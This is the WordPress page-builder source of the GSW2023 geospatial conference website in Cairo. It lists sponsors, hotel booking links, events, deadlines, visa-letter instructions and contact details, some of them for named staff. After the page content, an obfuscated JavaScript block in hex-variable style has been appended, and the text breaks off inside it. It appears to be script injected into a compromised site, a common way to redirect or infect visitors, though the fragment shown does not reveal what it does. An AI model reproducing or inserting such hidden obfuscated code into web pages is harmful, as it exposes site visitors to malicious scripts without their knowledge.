!important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508192388{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\">\n<h3 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></h3>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></p>\n<p style=\"text-align: center;\">\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 